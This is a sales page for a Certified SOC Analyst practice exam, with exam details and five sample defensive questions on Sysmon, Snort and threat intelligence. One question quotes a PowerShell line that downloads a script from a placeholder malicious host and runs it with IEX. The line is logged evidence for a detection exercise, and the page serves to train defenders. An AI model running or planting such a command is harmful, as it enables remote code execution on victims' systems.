EC-Council · CSA
Validates foundational and advanced skills in Security Operations Center monitoring and analysis, covering SOC operations, SIEM deployment and use cases, log management, incident triaging, indicators of compromise investigation, threat hunting, and malware analysis.
Questions
570
Duration
180 minutes
Passing Score
70%
Difficulty
AssociateLast Updated
Feb 2026
Use this CSA practice exam to prepare for Certified SOC Analyst (CSA) with realistic questions, detailed explanations, and focused study modes. The practice bank includes 570 questions for EC-Council CSA, so you can review the exam steadily instead of relying on one long cram session.
As you practice, pay extra attention to patterns in your missed answers. Start with short sessions to identify weak areas, then move into timed quizzes once your accuracy is consistent.
The explanations are especially useful when you want to connect exam wording to the responsibilities and scenarios described in the official certification guidance. Use the free preview first, then unlock the full question bank when you are ready to build a complete study routine.
The Certified SOC Analyst (CSA) — exam code 312-39 — is an associate-level credential awarded by EC-Council that validates a candidate's ability to perform Tier I and Tier II Security Operations Center (SOC) functions. The certification covers the full SOC workflow, from understanding the People, Process, and Technology framework of SOC operations to deploying and tuning SIEM platforms, managing centralized log pipelines, triaging alerts, investigating indicators of compromise (IoCs), and executing incident response procedures. The curriculum spans over 350 SIEM use cases across application, network, insider-threat, and compliance scenarios, and incorporates AI-enabled capabilities for alert prioritization, threat detection automation, and SIEM rule generation.
The CSA is the only SOC analyst credential that maps 100% to the NIST/NICE Framework under the Protect and Defend (PR) work role of Cyber Defense Analysis (CDA). It was recently updated to CSA v2, adding modules on cloud security operations (AWS, Azure, GCP), forensic investigation and malware analysis within a SOC context, and threat hunting using modern tools such as Velociraptor, YARA, and UEBA platforms. Candidates gain hands-on experience with industry-standard platforms including Splunk, the ELK Stack, OSSIM, and Log360, preparing them to operate effectively in real-world SOC environments from day one.
The CSA is primarily designed for current and aspiring Tier I and Tier II SOC analysts seeking to formalize and advance their operational skills. It is equally well-suited for network administrators, network security engineers, and cybersecurity analysts who want to transition into a dedicated security operations role. IT professionals working in network defense, security monitoring, or incident handling — including federal employees and government contractors with NICE Framework responsibilities — will find the credential directly applicable to their daily work.
Candidates do not need prior security certifications to pursue the CSA, but a foundational understanding of networking concepts, operating systems, and basic cybersecurity principles is strongly recommended. Professionals who have completed EC-Council's Network Defense Essentials (NDE) or Certified Network Defender (CND), or who hold equivalent knowledge, are well-positioned to succeed.
EC-Council does not mandate formal prerequisites for the CSA exam, making it accessible to candidates early in their cybersecurity careers. However, EC-Council recommends that candidates possess a working knowledge of networking fundamentals (TCP/IP, protocols, network devices), basic operating system concepts for both Windows and Linux environments, and a general understanding of information security concepts before attempting the exam.
Candidates who complete EC-Council's official CSA training program — available in instructor-led, online self-paced, and live-online formats — are best prepared for the exam, as the course is aligned directly to the exam blueprint. Practical familiarity with at least one SIEM platform (such as Splunk or the ELK Stack) and exposure to log analysis tools will significantly ease the learning curve for the more heavily weighted domains.
The CSA exam (code 312-39) consists of 100 multiple-choice questions delivered in a proctored format through EC-Council's ECC Exam Centre. Candidates are allotted 180 minutes (3 hours) to complete the exam. A passing score of 70% (70 out of 100 correct) is required to earn the certification. The exam is available as an online proctored test or at an authorized EC-Council testing center.
The exam is aligned to the CSA v2 blueprint, and all questions are mapped to the eight official exam domains. There are no separate practical or lab components required to earn the certification, though EC-Council's official training includes extensive hands-on lab exercises. The exam fee is approximately $250 USD, and the resulting certification is valid for three years, after which holders must earn continuing education credits or retake the exam to maintain the credential.
Earning the CSA credential positions professionals for Tier I and Tier II SOC analyst roles, which are among the most consistently in-demand positions in cybersecurity. SOC analysts in the United States typically earn between $60,000 and $95,000 annually at the entry-to-mid level, with Tier II analysts and those holding recognized credentials commanding salaries toward the higher end of that range. The CSA is recognized by government agencies and federal contractors, and its alignment to the NICE Framework (CDA work role) makes it relevant for public-sector cybersecurity positions that require role-based certifications.
Compared to alternatives such as CompTIA CySA+ or the SANS GIAC GCIA, the CSA is more narrowly focused on SOC operations and SIEM-centric detection workflows, making it a strong choice for professionals whose day-to-day work centers on alert triage and incident monitoring rather than broader threat analysis or network forensics. The CSA is often pursued as a stepping stone toward more advanced EC-Council credentials such as the Certified Incident Handler (E|CIH) or Certified Threat Intelligence Analyst (C|TIA), or toward vendor-specific SIEM certifications from Splunk or Microsoft.
5 sample questions with answers and explanations. Start a practice session to test yourself across all 570 questions.
Preview — answers shown1. During malware analysis, a reverse engineer needs to monitor registry modifications made by a suspicious executable. Which Sysmon Event IDs should be monitored to capture registry key creation, modification, and deletion? (Select three!)
Multiple correct answersExplanation
Sysmon Event IDs 12, 13, and 14 collectively cover all registry operations: Event ID 12 captures registry key and value creation and deletion, Event ID 13 logs registry value modifications (RegistryEvent Value Set), and Event ID 14 detects registry key and value rename operations. Together these three events provide comprehensive visibility into registry changes used for persistence, configuration, and defense evasion. Event ID 11 monitors file creation, not registry activity. Event ID 15 tracks alternate data streams for files. Event ID 19 detects WMI persistence mechanisms, which while related to persistence, does not capture direct registry modifications.
2. A network security analyst writes a Snort IDS rule to detect HTTP POST requests containing potential credit card data being exfiltrated to external IP addresses. The rule should only process established TCP connections to reduce false positives from incomplete handshakes. Which Snort rule option ensures the rule only evaluates packets belonging to established TCP sessions? (Select one!)
Explanation
The flow option with established flag ensures Snort only evaluates packets belonging to established TCP connections where the three-way handshake has completed, avoiding false positives from connection setup traffic and reducing processing overhead. The to_server direction specifies traffic flowing from client toward server, appropriate for POST requests. The content option with http_method matches HTTP POST methods but does not verify TCP connection state. The pcre option performs pattern matching for credit card number sequences but does not filter based on connection establishment state. The threshold option controls alert frequency by limiting how often the rule triggers but does not verify that packets belong to established sessions. Combining flow with other options creates comprehensive detection for data exfiltration in established connections.
3. A SOC team configures Sysmon to detect process injection attacks. The team needs to identify when one process creates a thread in another process's memory space. Which Sysmon Event ID should the team monitor for this attack technique? (Select one!)
Explanation
Sysmon Event ID 8 (CreateRemoteThread) specifically detects when one process creates a thread in another process, which is a primary indicator of process injection techniques mapped to MITRE ATT&CK T1055. This event captures the source process, target process, and thread creation details essential for detecting code injection attacks. Event ID 1 logs process creation but not inter-process thread manipulation. Event ID 7 tracks DLL loading which can indicate injection but occurs after thread creation. Event ID 11 monitors file creation events unrelated to memory-based process injection.
4. A threat hunting team uses PowerShell Script Block Logging (Event ID 4104) to detect malicious activity. An event contains the deobfuscated script content: [System.Net.WebClient]::new().DownloadString('http://malicious.com/payload.ps1') | IEX. Which MITRE ATT&CK technique is demonstrated? (Select one!)
Explanation
The script demonstrates T1105 Ingress Tool Transfer by downloading a remote payload (DownloadString from external URL) combined with T1059.001 PowerShell execution (using IEX/Invoke-Expression to execute the downloaded content). This represents the complete attack chain of transferring malicious tools and executing them. While PowerShell execution (T1059.001) is present, it does not capture the download component. T1071.001 Web Protocols describes command and control communication channels, not the initial payload delivery. T1027 Obfuscated Files would apply if the script itself was encoded or obfuscated, but Event ID 4104 logs deobfuscated content, revealing the plaintext attack.
5. A SOC team receives tactical threat intelligence from an ISAC partner describing attacker TTPs observed in recent campaigns. The intelligence includes specific command-line patterns, lateral movement techniques, and persistence mechanisms. Which threat intelligence type and typical timeframe does this represent? (Select two!)
Multiple correct answersExplanation
Tactical threat intelligence focuses on TTPs (tactics, techniques, and procedures) and attack patterns, providing SOC teams with information about how adversaries operate. This intelligence type remains relevant for weeks to months as attackers evolve their methods gradually. Tactical intelligence is consumed by SOC managers and analysts to improve detection rules and hunting strategies. Strategic intelligence addresses high-level trends and risks for executive audiences over months to years. Technical intelligence provides specific IOCs like IP addresses and file hashes with hours to days relevance. The described content focuses on adversary behaviors and methods, making it tactical with medium-term applicability.
Certified Threat Intelligence Analyst (CTIA)
CTIA · 740 questions
Certified Cybersecurity Technician (CCT)
CCT · 630 questions
Certified Secure Computer User (CSCU)
CSCU · 630 questions
EC-Council Certified Encryption Specialist (ECES)
ECES · 627 questions
Ethical Hacking Essentials (EHE)
EHE · 627 questions
ICS/SCADA Cybersecurity
ICS-SCADA · 627 questions
$17.99
One-time access to this exam